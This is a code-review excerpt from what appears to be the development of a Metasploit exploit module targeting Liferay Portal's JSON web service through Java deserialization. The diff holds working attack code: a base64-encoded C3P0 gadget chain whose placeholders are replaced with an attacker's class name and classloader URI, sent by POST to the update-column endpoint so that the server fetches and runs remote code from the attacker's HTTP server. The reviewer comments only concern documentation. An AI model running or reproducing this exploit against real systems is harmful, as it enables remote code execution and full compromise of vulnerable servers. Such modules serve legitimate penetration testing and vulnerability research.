modules/exploits/multi/http/liferay_java_unmarshalling.rb

```diff
@@ -0,0 +1,170 @@
+      )
+    end
+
+    # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
+    if build < 7201
+      return CheckCode::Appears(
+        "Liferay #{version} MAY be a vulnerable version. Please verify."
+      )
+    end
+
+    CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    # Start our HTTP server to provide remote classloading
+    @classloader_uri = start_service
+
+    unless @classloader_uri
+      fail_with(Failure::BadConfig, 'Could not start remote classloader server')
+    end
+
+    print_good("Started remote classloader server at #{@classloader_uri}")
+
+    send_request_gadget(normalize_uri(
+      target_uri.path,
+      '/api/jsonws/expandocolumn/update-column'
+    ))
+  end
+
+  def send_request_gadget(uri)
+    print_status("Unmarshalling remote classloader at #{full_uri(uri)}")
+
+    # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
+    vars_post = {
+      'columnId' => rand(8..42),
+      'name'     => rand(8..42),
+      'type'     => rand(8..42)
+    }
+
+    vars_post['+defaultData'] =
+      'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'
+
+    vars_post['defaultData.userOverridesAsString'] =
+      "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"
+
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => uri,
+      'vars_post' => vars_post
+    }, 0)
+  end
+
+  # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
+  def go_go_gadget
+    # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
+    gadget = Rex::Text.decode_base64(
+      <<~EOF
+        rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
+        cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
+        bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
+        ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
+        bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
+        DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
+        aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
+        AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
+        ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
+        kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
+      EOF
+    )
+
+    # Replace length-prefixed placeholder strings with our own
+    gadget.sub!("\x00\x04HACK",  packed_class_name)
+    gadget.sub!("\x00\x03THE",   packed_classloader_uri)
+    gadget.sub("\x00\x06PLANET", packed_class_name)
+  end
+
+  def packed_classloader_uri
```

Comment:
Any chance you could add a comment here explaining the purpose of this function?

Reply:
It's commented directly above where it's used, but I'll add a specific comment for this _method_. :-)

Reply:
Method, function, all the same :grin:

Reply:
Updated.

Reply:
Verified fixed.